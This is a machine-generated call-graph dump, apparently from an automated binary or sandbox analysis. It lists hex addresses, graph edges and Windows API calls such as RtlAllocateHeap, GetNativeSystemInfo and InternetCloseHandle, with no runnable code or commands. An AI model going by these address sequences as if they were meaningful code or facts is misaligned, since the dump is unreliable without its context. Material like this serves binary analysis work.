13754->13755 13756 a06676 13755->13756 13757 a05b20 RtlAllocateHeap 13756->13757 13758 a06681 13757->13758 13759 a02280 5 API calls 13758->13759 13760 a06699 shared_ptr 13759->13760 13761 a17870 RtlAllocateHeap 13760->13761 13764 a068b3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 13760->13764 13762 a06702 13761->13762 13763 a05b20 RtlAllocateHeap 13762->13763 13765 a0670d 13763->13765 13764->13455 13766 a02280 5 API calls 13765->13766 13774 a06727 shared_ptr 13766->13774 13767 a06822 13768 a17f30 RtlAllocateHeap 13767->13768 13770 a0686c 13768->13770 13769 a17870 RtlAllocateHeap 13769->13774 13771 a17f30 RtlAllocateHeap 13770->13771 13771->13764 13772 a05b20 RtlAllocateHeap 13772->13774 13773 a02280 5 API calls 13773->13774 13774->13764 13774->13767 13774->13769 13774->13772 13774->13773 13776 a06c71 13775->13776 13784 a06998 shared_ptr 13775->13784 13777 a06d33 13776->13777 13778 a06c94 13776->13778 13780 a18070 RtlAllocateHeap 13777->13780 13779 a17f30 RtlAllocateHeap 13778->13779 13781 a06cb3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 13779->13781 13780->13781 13781->13463 13782 a17f30 RtlAllocateHeap 13782->13784 13783 a191b0 RtlAllocateHeap 13783->13784 13784->13776 13784->13777 13784->13781 13784->13782 13784->13783 13786 a07d66 __cftof 13785->13786 13787 a17870 RtlAllocateHeap 13786->13787 13819 a07eb8 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 13786->13819 13788 a07d97 13787->13788 13789 a05b20 RtlAllocateHeap 13788->13789 13790 a07da2 13789->13790 13791 a17870 RtlAllocateHeap 13790->13791 13792 a07dc4 13791->13792 13793 a05b20 RtlAllocateHeap 13792->13793 13795 a07dcf shared_ptr 13793->13795 13794 a07ea3 GetNativeSystemInfo 13796 a07ea7 13794->13796 13795->13794 13795->13796 13795->13819 13797 a07fe9 13796->13797 13798 a07f0f 13796->13798 13796->13819 13799 a17870 RtlAllocateHeap 13797->13799 13800 a17870 RtlAllocateHeap 13798->13800 13801 a08015 13799->13801 13802 a07f30 13800->13802 13803 a05b20 RtlAllocateHeap 13801->13803 13804 a05b20 RtlAllocateHeap 13802->13804 13805 a0801c 13803->13805 13806 a07f37 13804->13806 13808 a17870 RtlAllocateHeap 13805->13808 13807 a17870 RtlAllocateHeap 13806->13807 13809 a07f4f 13807->13809 13810 a08034 13808->13810 13811 a05b20 RtlAllocateHeap 13809->13811 13812 a05b20 RtlAllocateHeap 13810->13812 13814 a07f56 13811->13814 13813 a0803b 13812->13813 13815 a17870 RtlAllocateHeap 13813->13815 14625 a38a81 13814->14625 13817 a0806c 13815->13817 13818 a05b20 RtlAllocateHeap 13817->13818 13820 a08073 13818->13820 13819->13467 13821 a05640 RtlAllocateHeap 13820->13821 13822 a08082 13821->13822 13823 a17870 RtlAllocateHeap 13822->13823 13824 a080bd 13823->13824 13825 a05b20 RtlAllocateHeap 13824->13825 13826 a080c4 13825->13826 13827 a17870 RtlAllocateHeap 13826->13827 13828 a080dc 13827->13828 13829 a05b20 RtlAllocateHeap 13828->13829 13830 a080e3 13829->13830 13831 a17870 RtlAllocateHeap 13830->13831 13832 a08114 13831->13832 13833 a05b20 RtlAllocateHeap 13832->13833 13834 a0811b 13833->13834 13835 a05640 RtlAllocateHeap 13834->13835 13836 a0812a 13835->13836 13837 a17870 RtlAllocateHeap 13836->13837 13838 a08165 13837->13838 13839 a05b20 RtlAllocateHeap 13838->13839 13840 a0816c 13839->13840 13841 a17870 RtlAllocateHeap 13840->13841 13842 a08184 13841->13842 13843 a05b20 RtlAllocateHeap 13842->13843 13844 a0818b 13843->13844 13845 a17870 RtlAllocateHeap 13844->13845 13846 a081bc 13845->13846 13847 a05b20 RtlAllocateHeap 13846->13847 13848 a081c3 13847->13848 13849 a05640 RtlAllocateHeap 13848->13849 13849->13819 13851 a04594 13850->13851 13851->13851 13852 a04607 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 13851->13852 13853 a17f30 RtlAllocateHeap 13851->13853 13852->13470 13853->13852 13855 a08315 __cftof 13854->13855 13856 a17870 RtlAllocateHeap 13855->13856 13859 a08333 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 13855->13859 13857 a0834c 13856->13857 13858 a05b20 RtlAllocateHeap 13857->13858 13860 a08357 13858->13860 13859->13474 13861 a17870 RtlAllocateHeap 13860->13861 13862 a08379 13861->13862 13863 a05b20 RtlAllocateHeap 13862->13863 13865 a08384 shared_ptr 13863->13865 13864 a08454 GetNativeSystemInfo 13864->13859 13865->13859 13865->13864 13869 a17c71 13866->13869 13870 a17c9c 13866->13870 13867 a17d90 13868 a191a0 RtlAllocateHeap 13867->13868 13873 a17d01 shared_ptr 13868->13873 13869->13538 13870->13867 13871 a17d8b 13870->13871 13874 a17cf0 13870->13874 13875 a17d17 13870->13875 13872 a02440 RtlAllocateHeap 13871->13872 13872->13867 13873->13538 13874->13871 13876 a17cfb 13874->13876 13875->13873 13877 a1d312 RtlAllocateHeap 13875->13877 13878 a1d312 RtlAllocateHeap 13876->13878 13877->13873 13878->13873 13880 a175d0 RtlAllocateHeap 13879->13880 13882 a180e0 13880->13882 13881 a18132 13881->13545 13882->13881 14650 a18bd0 13882->14650 13885 a17870 RtlAllocateHeap 13884->13885 13886 a0984e 13885->13886 13887 a05b20 RtlAllocateHeap 13886->13887 13888 a09857 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr __cftof 13887->13888 13888->13557 13890 a38994 13889->13890 13891 a386d7 5 API calls 13890->13891 13892 a3899e 13891->13892 13892->13563 13894 a18269 13893->13894 13895 a1827d 13894->13895 13896 a18e70 RtlAllocateHeap 13894->13896 13895->13636 13896->13895 13898 a17f30 RtlAllocateHeap 13897->13898 13899 a049b3 13898->13899 13900 a17f30 RtlAllocateHeap 13899->13900 13901 a049cc 13900->13901 14662 a04650 13901->14662 13903 a04a59 shared_ptr 13903->13693 13907 a175eb 13904->13907 13915 a176d4 shared_ptr 13904->13915 13905 a191a0 RtlAllocateHeap 13906 a17766 13905->13906 13908 a02440 RtlAllocateHeap 13906->13908 13909 a17681 13907->13909 13910 a1765a 13907->13910 13914 a1766b 13907->13914 13907->13915 13911 a1776b 13908->13911 13912 a1d312 RtlAllocateHeap 13909->13912 13909->13914 13910->13906 13913 a1d312 RtlAllocateHeap 13910->13913 13912->13914 13913->13914 13914->13905 13914->13915 13915->13699 13917 a1358f 13916->13917 13924 a13d7f __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 13916->13924 13918 a17f30 RtlAllocateHeap 13917->13918 13919 a135c0 13918->13919 13920 a14237 13919->13920 13921 a17f30 RtlAllocateHeap 13919->13921 13922 a18070 RtlAllocateHeap 13920->13922 13923 a1360f 13921->13923 13925 a1423c 13922->13925 13923->13920 13927 a17f30 RtlAllocateHeap 13923->13927 13924->13750 13926 a18070 RtlAllocateHeap 13925->13926 13930 a14241 13926->13930 13928 a13653 13927->13928 13928->13920 13929 a13675 13928->13929 13931 a17f30 RtlAllocateHeap 13929->13931 13933 a18070 RtlAllocateHeap 13930->13933 13932 a13695 13931->13932 13934 a17870 RtlAllocateHeap 13932->13934 13937 a14250 13933->13937 13935 a136a8 13934->13935 13936 a05b20 RtlAllocateHeap 13935->13936 13938 a136b3 13936->13938 14335 a1c0c9 13937->14335 13938->13925 13940 a136ff 13938->13940 13941 a17f30 RtlAllocateHeap 13940->13941 13944 a13721 shared_ptr 13941->13944 13942 a1c109 RtlAllocateHeap 13942->13924 13943 a09820 RtlAllocateHeap 13945 a13782 13943->13945 13944->13930 13944->13943 13946 a17870 RtlAllocateHeap 13945->13946 13951 a13b89 shared_ptr 13945->13951 13947 a13799 13946->13947 13948 a05b20 RtlAllocateHeap 13947->13948 13949 a137a4 13948->13949 13950 a17f30 RtlAllocateHeap 13949->13950 13952 a137ec shared_ptr 13950->13952 13951->13924 13951->13942 13952->13930 13953 a138cd 13952->13953 14005 a139c7 shared_ptr __dosmaperr 13952->14005 13954 a17f30 RtlAllocateHeap 13953->13954 13955 a138ea 13954->13955 14187 a0aca0 13955->14187 13956 a38979 5 API calls 13958 a13a8a 13956->13958 13958->13937 13959 a13a99 13958->13959 13959->13951 13960 a13ab2 13959->13960 13961 a13e52 13959->13961 13962 a13d84 13959->13962 13963 a13b9d 13959->13963 13965 a17f30 RtlAllocateHeap 13960->13965 13968 a17870 RtlAllocateHeap 13961->13968 13966 a17f30 RtlAllocateHeap 13962->13966 13969 a17f30 RtlAllocateHeap 13963->13969 13964 a17870 RtlAllocateHeap 13967 a139a6 13964->13967 13971 a13ada 13965->13971 13972 a13dac 13966->13972 13973 a17870 RtlAllocateHeap 13967->13973 13974 a13e66 13968->13974 13975 a13bc5 13969->13975 13970 a138f5 shared_ptr 13970->13937 13970->13964 13976 a17870 RtlAllocateHeap 13971->13976 13977 a17870 RtlAllocateHeap 13972->13977 13978 a139b8 13973->13978 13979 a17870 RtlAllocateHeap 13974->13979 13980 a17870 RtlAllocateHeap 13975->13980 13981 a13af8 13976->13981 13982 a13dca 13977->13982 13983 a04960 RtlAllocateHeap 13978->13983 13984 a13e7e 13979->13984 13985 a13be3 13980->13985 13986 a05b20 RtlAllocateHeap 13981->13986 13987 a05b20 RtlAllocateHeap 13982->13987 13983->14005 13988 a17870 RtlAllocateHeap 13984->13988 13989 a05b20 RtlAllocateHeap 13985->13989 13990 a13aff 13986->13990 13991 a13dd1 13987->13991 13992 a13e96 13988->13992 13993 a13bea 13989->13993 13994 a17870 RtlAllocateHeap 13990->13994 13995 a17870 RtlAllocateHeap 13991->13995 13996 a17870 RtlAllocateHeap 13992->13996 13997 a17870 RtlAllocateHeap 13993->13997 14000 a13b17 13994->14000 14001 a13de9 13995->14001 13998 a13ea8 13996->13998 13999 a13bff 13997->13999 14198 a12e20 13998->14198 14004 a17870 RtlAllocateHeap 13999->14004 14006 a17870 RtlAllocateHeap 14000->14006 14002 a17870 RtlAllocateHeap 14001->14002 14007 a13e01 14002->14007 14008 a13c17 14004->14008 14005->13937 14005->13956 14009 a13b2f 14006->14009 14010 a17870 RtlAllocateHeap 14007->14010 14011 a17870 RtlAllocateHeap 14008->14011 14012 a17870 RtlAllocateHeap 14009->14012 14013 a13e19 14010->14013 14014 a13c2f 14011->14014 14015 a13b47 14012->14015 14016 a17870 RtlAllocateHeap 14013->14016 14017 a17870 RtlAllocateHeap 14014->14017 14018 a17870 RtlAllocateHeap 14015->14018 14020 a13e31 14016->14020 14021 a13c47 14017->14021 14019 a13b5f 14018->14019 14022 a17870 RtlAllocateHeap 14019->14022 14023 a17870 RtlAllocateHeap 14020->14023 14024 a17870 RtlAllocateHeap 14021->14024 14025 a13b77 14022->14025 14023->14025 14026 a13c59 14024->14026 14028 a17870 RtlAllocateHeap 14025->14028 14029 a11dd0 14026->14029 14028->13951 14030 a17f30 RtlAllocateHeap 14029->14030 14031 a11e6b 14030->14031 14032 a11ee8 14031->14032 14033 a11e78 14031->14033 14034 a17f30 RtlAllocateHeap 14032->14034 14035 a17870 RtlAllocateHeap 14033->14035 14042 a11f27 shared_ptr 14034->14042 14036 a11e92 14035->14036 14037 a05b20 RtlAllocateHeap 14036->14037 14038 a11e99 14037->14038 14039 a17870 RtlAllocateHeap 14038->14039 14041 a11eaf 14039->14041 14040 a12041 14046 a17870 RtlAllocateHeap 14040->14046 14045 a17870 RtlAllocateHeap 14041->14045 14042->14040 14043 a12dd5 14042->14043 14044 a11fbf 14042->14044 14073 a12936 shared_ptr 14042->14073 14049 a18070 RtlAllocateHeap 14043->14049 14047 a17f30 RtlAllocateHeap 14044->14047 14048 a11ec7 14045->14048 14050 a12050 14046->14050 14059 a11fe3 shared_ptr 14047->14059 14051 a17870 RtlAllocateHeap 14048->14051 14052 a12dda 14049->14052 14053 a05b20 RtlAllocateHeap 14050->14053 14133 a11edf 14051->14133 14055 a18070 RtlAllocateHeap 14052->14055 14061 a1205b 14053->14061 14054 a1c0c9 std::_Xinvalid_argument RtlAllocateHeap 14056 a12e02 14054->14056 14065 a12ddf 14055->14065 14060 a1c109 RtlAllocateHeap 14056->14060 14057 a17f30 RtlAllocateHeap 14057->14040 14058 a17870 RtlAllocateHeap 14062 a12afc 14058->14062 14059->14057 14059->14073 14061->14052 14063 a120b2 14061->14063 14064 a0e440 6 API calls 14062->14064 14066 a17f30 RtlAllocateHeap 14063->14066 14064->14073 14067 a1c0c9 std::_Xinvalid_argument RtlAllocateHeap 14065->14067 14069 a120d7 shared_ptr 14066->14069 14067->14073 14068 a17870 RtlAllocateHeap 14070 a12142 14068->14070 14069->14065 14069->14068 14071 a05b20 RtlAllocateHeap 14070->14071 14072 a1214d 14071->14072 14074 a17f30 RtlAllocateHeap 14072->14074 14073->14054 14075 a12db0 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14073->14075 14076 a121b4 shared_ptr __dosmaperr 14074->14076 14075->13951 14076->14065 14077 a38979 5 API calls 14076->14077 14078 a12265 14077->14078 14078->14065 14079 a12274 14078->14079 14079->14056 14081 a124b7 14079->14081 14082 a1256b 14079->14082 14083 a123ba 14079->14083 14084 a1228d 14079->14084 14126 a122e2 shared_ptr 14079->14126 14080 a17870 RtlAllocateHeap 14088 a12640 14080->14088 14087 a17870 RtlAllocateHeap 14081->14087 14086 a17870 RtlAllocateHeap 14082->14086 14085 a17870 RtlAllocateHeap 14083->14085 14089 a17870 RtlAllocateHeap 14084->14089 14090 a123d1 14085->14090 14091 a12582 14086->14091 14092 a124ce 14087->14092 14093 a17870 RtlAllocateHeap 14088->14093 14094 a122a4 14089->14094 14095 a17870 RtlAllocateHeap 14090->14095 14096 a17870 RtlAllocateHeap 14091->14096 14097 a17870 RtlAllocateHeap 14092->14097 14098 a12652 14093->14098 14099 a17870 RtlAllocateHeap 14094->14099 14100 a123e9 14095->14100 14101 a1259a 14096->14101 14102 a124e6 14097->14102 14111 a36659 RtlAllocateHeap 14098->14111 14103 a122bc 14099->14103 14104 a17870 RtlAllocateHeap 14100->14104 14105 a17870 RtlAllocateHeap 14101->14105 14106 a17870 RtlAllocateHeap 14102->14106 14107 a17870 RtlAllocateHeap 14103->14107 14119 a12401 14104->14119 14109 a125b2 14105->14109 14110 a124fe 14106->14110 14108 a122d4 14107->14108 14338 a08c60 14108->14338 14538 a08de0 14109->14538 14528 a08f60 14110->14528 14115 a1267a 14111->14115 14116 a12a83 14115->14116 14118 a366e7 5 API calls 14115->14118 14117 a17870 RtlAllocateHeap 14116->14117 14120 a12a9d 14117->14120 14121 a1268b 14118->14121 14123 a17f30 RtlAllocateHeap 14119->14123 14124 a05b20 RtlAllocateHeap 14120->14124 14122 a17870 RtlAllocateHeap 14121->14122 14131 a126a0 shared_ptr __dosmaperr 14122->14131 14123->14126 14125 a12aa4 14124->14125 14127 a17870 RtlAllocateHeap 14125->14127 14126->14073 14126->14080 14128 a12aba 14127->14128 14129 a17870 RtlAllocateHeap 14128->14129 14130 a12ad2 14129->14130 14132 a17870 RtlAllocateHeap 14130->14132 14131->14073 14134 a38979 5 API calls 14131->14134 14132->14133 14133->14058 14135 a12759 14134->14135 14135->14056 14135->14073 14135->14116 14136 a12781 14135->14136 14137 a17870 RtlAllocateHeap 14136->14137 14138 a12798 14137->14138 14139 a17870 RtlAllocateHeap 14138->14139 14140 a127ad 14139->14140 14348 a07780 14140->14348 14142 a127b6 14143 a127d1 14142->14143 14144 a12a26 14142->14144 14145 a17870 RtlAllocateHeap 14143->14145 14146 a17870 RtlAllocateHeap 14144->14146 14148 a127db 14145->14148 14147 a12a30 14146->14147 14149 a05b20 RtlAllocateHeap 14147->14149 14150 a05b20 RtlAllocateHeap 14148->14150 14151 a12a37 14149->14151 14152 a127e2 14150->14152 14153 a17870 RtlAllocateHeap 14151->14153 14154 a17870 RtlAllocateHeap 14152->14154 14155 a12a4d 14153->14155 14156 a127f8 14154->14156 14157 a17870 RtlAllocateHeap 14155->14157 14158 a17870 RtlAllocateHeap 14156->14158 14159 a12a65 14157->14159 14160 a12810 14158->14160 14162 a17870 RtlAllocateHeap 14159->14162 14161 a17870 RtlAllocateHeap 14160->14161 14163 a12828 14161->14163 14162->14133 14164 a17870 RtlAllocateHeap 14163->14164 14165 a1283a 14164->14165 14361 a0e440 14165->14361 14167 a12843 14167->14073 14168 a17870 RtlAllocateHeap 14167->14168 14169 a128a4 14168->14169 14170 a05b20 RtlAllocateHeap 14169->14170 14171 a128af 14170->14171 14172 a18250 RtlAllocateHeap 14171->14172 14173 a128c3 14172->14173 14497 a18510 14173->14497 14175 a128d7 14176 a18250 RtlAllocateHeap 14175->14176 14177 a128e7 14176->14177 14178 a17870 RtlAllocateHeap 14177->14178 14179 a12907 14178->14179 14501 a088b0 14179->14501 14181 a1290e 14182 a17870 RtlAllocateHeap 14181->14182 14183 a12923 14182->14183 14184 a05b20 RtlAllocateHeap 14183->14184 14185 a1292a 14184->14185 14509 a05df0 14185->14509 14189 a0adf0 14187->14189 14188 a0ae16 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14188->13970 14189->14188 14190 a04570 RtlAllocateHeap 14189->14190 14191 a0aedb __cftof 14190->14191 14595 a05500 14191->14595 14193 a0af7e 14194 a17f30 RtlAllocateHeap 14193->14194 14195 a0afbb 14194->14195 14196 a18070 RtlAllocateHeap 14195->14196 14197 a0b0bc 14196->14197 14199 a12ec5 14198->14199 14200 a17870 RtlAllocateHeap 14199->14200 14201 a12ed1 14200->14201 14202 a05b20 RtlAllocateHeap 14201->14202 14203 a12edc 14202->14203 14204 a17f30 RtlAllocateHeap 14203->14204 14205 a12f1f 14204->14205 14206 a17870 RtlAllocateHeap 14205->14206 14207 a1326c __cftof 14206->14207 14208 a132f2 InternetCloseHandle InternetCloseHandle 14207->14208 14209 a13331 14208->14209 14210 a17870 RtlAllocateHeap 14209->14210 14211 a133c4 14210->14211 14212 a05b20 RtlAllocateHeap 14211->14212 14213 a133cb 14212->14213 14214 a17870 RtlAllocateHeap 14213->14214 14215 a133de 14214->14215 14216 a17870 RtlAllocateHeap 14215->14216 14217 a133f3 14216->14217 14218 a17870 RtlAllocateHeap 14217->14218 14219 a13408 14218->14219 14220 a17870 RtlAllocateHeap 14219->14220 14221 a1341a 14220->14221 14222 a0e440 6 API calls 14221->14222 14223 a13423 14222->14223 14224 a17f30 RtlAllocateHeap 14223->14224 14230 a1351a __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14223->14230 14225 a135c0 14224->14225 14226 a14237 14225->14226 14227 a17f30 RtlAllocateHeap 14225->14227 14228 a18070 RtlAllocateHeap 14226->14228 14229 a1360f 14227->14229 14231 a1423c 14228->14231 14229->14226 14233 a17f30 RtlAllocateHeap 14229->14233 14230->13951 14232 a18070 RtlAllocateHeap 14231->14232 14236 a14241 14232->14236 14234 a13653 14233->14234 14234->14226 14235 a13675 14234->14235 14237 a17f30 RtlAllocateHeap 14235->14237 14239 a18070 RtlAllocateHeap 14236->14239 14238 a13695 14237->14238 14240 a17870 RtlAllocateHeap 14238->14240 14243 a14250 14239->14243 14241 a136a8 14240->14241 14242 a05b20 RtlAllocateHeap 14241->14242 14244 a136b3 14242->14244 14245 a1c0c9 std::_Xinvalid_argument RtlAllocateHeap 14243->14245 14244->14231 14246 a136ff 14244->14246 14257 a13b89 shared_ptr 14245->14257 14247 a17f30 RtlAllocateHeap 14246->14247 14250 a13721 shared_ptr 14247->14250 14248 a1c109 RtlAllocateHeap 14248->14230 14249 a09820 RtlAllocateHeap 14251 a13782 14249->14251 14250->14236 14250->14249 14252 a17870 RtlAllocateHeap 14251->14252 14251->14257 14253 a13799 14252->14253 14254 a05b20 RtlAllocateHeap 14253->14254 14255 a137a4 14254->14255 14256 a17f30 RtlAllocateHeap 14255->14256 14258 a137ec shared_ptr 14256->14258 14257->14230 14257->14248 14258->14236 14259 a138cd 14258->14259 14311 a139c7 shared_ptr __dosmaperr 14258->14311 14260 a17f30 RtlAllocateHeap 14259->14260 14261 a138ea 14260->14261 14263 a0aca0 6 API calls 14261->14263 14262 a38979 5 API calls 14264 a13a8a 14262->14264 14276 a138f5 shared_ptr 14263->14276 14264->14243 14265 a13a99 14264->14265 14265->14257 14266 a13ab2 14265->14266 14267 a13e52 14265->14267 14268 a13d84 14265->14268 14269 a13b9d 14265->14269 14271 a17f30 RtlAllocateHeap 14266->14271 14274 a17870 RtlAllocateHeap 14267->14274 14272 a17f30 RtlAllocateHeap 14268->14272 14275 a17f30 RtlAllocateHeap 14269->14275 14270 a17870 RtlAllocateHeap 14273 a139a6 14270->14273 14277 a13ada 14271->14277 14278 a13dac 14272->14278 14279 a17870 RtlAllocateHeap 14273->14279 14280 a13e66 14274->14280 14281 a13bc5 14275->14281 14276->14243 14276->14270 14282 a17870 RtlAllocateHeap 14277->14282 14283 a17870 RtlAllocateHeap 14278->14283 14284 a139b8 14279->14284 14285 a17870 RtlAllocateHeap 14280->14285 14286 a17870 RtlAllocateHeap 14281->14286 14287 a13af8 14282->14287 14288 a13dca 14283->14288 14289 a04960 RtlAllocateHeap 14284->14289 14290 a13e7e 14285->14290 14291 a13be3 14286->14291 14292 a05b20 RtlAllocateHeap 14287->14292 14293 a05b20 RtlAllocateHeap 14288->14293 14289->14311 14294 a17870 RtlAllocateHeap 14290->14294 14295 a05b20 RtlAllocateHeap 14291->14295 14296 a13aff 14292->14296 14297 a13dd1 14293->14297 14298 a13e96 14294->14298 14299 a13bea 14295->14299 14300 a17870 RtlAllocateHeap 14296->14300 14301 a17870 RtlAllocateHeap 14297->14301 14302 a17870 RtlAllocateHeap 14298->14302 14303 a17870 RtlAllocateHeap 14299->14303 14306 a13b17 14300->14306 14307 a13de9 14301->14307 14304 a13ea8 14302->14304 14305 a13bff 14303->14305 14309 a12e20 13 API calls 14304->14309 14310 a17870 RtlAllocateHeap 14305->14310 14312 a17870 RtlAllocateHeap 14306->14312 14308 a17870 RtlAllocateHeap 14307->14308 14313 a13e01 14308->14313 14309->14257 14314 a13c17 14310->14314 14311->14243 14311->14262 14315 a13b2f 14312->14315 14316 a17870 RtlAllocateHeap 14313->14316 14317 a17870 RtlAllocateHeap 14314->14317 14318 a17870 RtlAllocateHeap 14315->14318 14319 a13e19 14316->14319 14320 a13c2f 14317->14320 14321 a13b47 14318->14321 14322 a17870 RtlAllocateHeap 14319->14322 14323 a17870 RtlAllocateHeap 14320->14323 14324 a17870 RtlAllocateHeap 14321->14324 14326 a13e31 14322->14326 14327 a13c47 14323->14327 14325 a13b5f 14324->14325 14328 a17870 RtlAllocateHeap 14325->14328 14329 a17870 RtlAllocateHeap 14326->14329 14330 a17870 RtlAllocateHeap 14327->14330 14331 a13b77 14328->14331 14329->14331 14332 a13c59 14330->14332 14334 a17870 RtlAllocateHeap 14331->14334 14333 a11dd0 13 API calls 14332->14333 14333->14257 14334->14257 14622 a1c019 14335->14622 14337 a1c0da std::_Throw_future_error 14339 a08cb0 14338->14339 14340 a17870 RtlAllocateHeap 14339->14340 14341 a08cbf 14340->14341 14342 a05b20 RtlAllocateHeap 14341->14342 14343 a08cca 14342->14343 14344 a17f30 RtlAllocateHeap 14343->14344 14345 a08d1c 14344->14345 14346 a18150 RtlAllocateHeap 14345->14346 14347 a08d2e __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14346->14347 14347->14126 14548 a185b0 14348->14548 14350 a077c1 14351 a18250 RtlAllocateHeap 14350->14351 14352 a077d3 14351->14352 14353 a17870 RtlAllocateHeap 14352->14353 14354 a07831 14353->14354 14355 a17870 RtlAllocateHeap 14354->14355 14356 a0784c 14355->14356 14357 a05b20 RtlAllocateHeap 14356->14357 14358 a07853 14357->14358 14359 a17f30 RtlAllocateHeap 14358->14359 14360 a07876 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14359->14360 14360->14142 14362 a17870 RtlAllocateHeap 14361->14362 14363 a0e489 14362->14363 14364 a05b20 RtlAllocateHeap 14363->14364 14365 a0e494 14364->14365 14366 a17870 RtlAllocateHeap 14365->14366 14367 a0e4af 14366->14367 14368 a05b20 RtlAllocateHeap 14367->14368 14369 a0e4ba 14368->14369 14370 a191b0 RtlAllocateHeap 14369->14370 14371 a0e4cd 14370->14371 14372 a18250 RtlAllocateHeap 14371->14372 14373 a0e50f 14372->14373 14374 a18150 RtlAllocateHeap 14373->14374 14375 a0e520 14374->14375 14376 a18250 RtlAllocateHeap 14375->14376 14377 a0e531 14376->14377 14378 a17870 RtlAllocateHeap 14377->14378 14379 a0e6de 14378->14379 14380 a17870 RtlAllocateHeap 14379->14380 14381 a0e6f3 14380->14381 14382 a17870 RtlAllocateHeap 14381->14382 14383 a0e705 14382->14383 14384 a0bd60 5 API calls 14383->14384 14385 a0e711 14384->14385 14386 a17870 RtlAllocateHeap 14385->14386 14387 a0e726 14386->14387 14388 a17870 RtlAllocateHeap 14387->14388 14389 a0e73e 14388->14389 14390 a05b20 RtlAllocateHeap 14389->14390 14391 a0e745 14390->14391 14392 a084b0 RtlAllocateHeap 14391->14392 14394 a0e751 14392->14394 14393 a0e9a9 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14393->14167 14394->14393 14395 a17870 RtlAllocateHeap 14394->14395 14396 a0ea29 14395->14396 14397 a05b20 RtlAllocateHeap 14396->14397 14398 a0ea31 14397->14398 14557 a182f0 14398->14557 14400 a0ea46 14401 a18150 RtlAllocateHeap 14400->14401 14402 a0ea55 14401->14402 14403 a17870 RtlAllocateHeap 14402->14403 14404 a0ec70 14403->14404 14405 a05b20 RtlAllocateHeap 14404->14405 14406 a0ec78 14405->14406 14407 a182f0 RtlAllocateHeap 14406->14407 14408 a0ec8d 14407->14408 14409 a18150 RtlAllocateHeap 14408->14409 14412 a0ec9c 14409->14412 14410 a17f30 RtlAllocateHeap 14410->14412 14411 a0f5a9 shared_ptr 14411->14167 14412->14410 14412->14411 14413 a0f5db 14412->14413 14414 a17870 RtlAllocateHeap 14413->14414 14415 a0f637 14414->14415 14416 a05b20 RtlAllocateHeap 14415->14416 14417 a0f63e 14416->14417 14418 a17870 RtlAllocateHeap 14417->14418 14419 a0f651 14418->14419 14420 a17870 RtlAllocateHeap 14419->14420 14421 a0f666 14420->14421 14422 a17870 RtlAllocateHeap 14421->14422 14423 a0f67b 14422->14423 14424 a17870 RtlAllocateHeap 14423->14424 14425 a0f68d 14424->14425 14426 a0e440 6 API calls 14425->14426 14427 a0f696 14426->14427 14428 a17f30 RtlAllocateHeap 14427->14428 14429 a0f6ba 14428->14429 14430 a17870 RtlAllocateHeap 14429->14430 14431 a0f6ca 14430->14431 14432 a17f30 RtlAllocateHeap 14431->14432 14433 a0f6e7 14432->14433 14434 a17f30 RtlAllocateHeap 14433->14434 14436 a0f700 14434->14436 14435 a0f892 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14435->14167 14436->14435 14437 a17870 RtlAllocateHeap 14436->14437 14438 a0f914 14437->14438 14439 a05b20 RtlAllocateHeap 14438->14439 14440 a0f91b 14439->14440 14441 a17870 RtlAllocateHeap 14440->14441 14442 a0f92e 14441->14442 14443 a17870 RtlAllocateHeap 14442->14443 14444 a0f943 14443->14444 14445 a17870 RtlAllocateHeap 14444->14445 14446 a0f958 14445->14446 14447 a17870 RtlAllocateHeap 14446->14447 14448 a0f96a 14447->14448 14449 a0e440 6 API calls 14448->14449 14451 a0f973 14449->14451 14450 a0fa45 shared_ptr 14450->14167 14451->14450 14452 a17870 RtlAllocateHeap 14451->14452 14453 a0fab5 14452->14453 14565 a094b0 14453->14565 14455 a0fac4 14580 a09160 14455->14580 14457 a0fad3 14458 a18250 RtlAllocateHeap 14457->14458 14459 a0faeb 14458->14459 14459->14459 14460 a17f30 RtlAllocateHeap 14459->14460 14461 a0fb9c 14460->14461 14462 a17870 RtlAllocateHeap 14461->14462 14463 a0fbb7 14462->14463 14464 a17870 RtlAllocateHeap 14463->14464 14465 a0fbc9 14464->14465 14466 a36659 RtlAllocateHeap 14465->14466 14467 a0fbf1 14466->14467 14468 a17870 RtlAllocateHeap 14467->14468 14469 a104e4 14468->14469 14470 a05b20 RtlAllocateHeap 14469->14470 14471 a104eb 14470->14471 14472 a17870 RtlAllocateHeap 14471->14472 14473 a10501 14472->14473 14474 a17870 RtlAllocateHeap 14473->14474 14475 a10519 14474->14475 14476 a17870 RtlAllocateHeap 14475->14476 14477 a10531 14476->14477 14478 a17870 RtlAllocateHeap 14477->14478 14479 a10543 14478->14479 14480 a0e440 6 API calls 14479->14480 14482 a1054c 14480->14482 14481 a10790 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z shared_ptr 14481->14167 14482->14481 14483 a17870 RtlAllocateHeap 14482->14483 14484 a10897 14483->14484 14485 a05b20 RtlAllocateHeap 14484->14485 14486 a1089e 14485->14486 14487 a17870 RtlAllocateHeap 14486->14487 14488 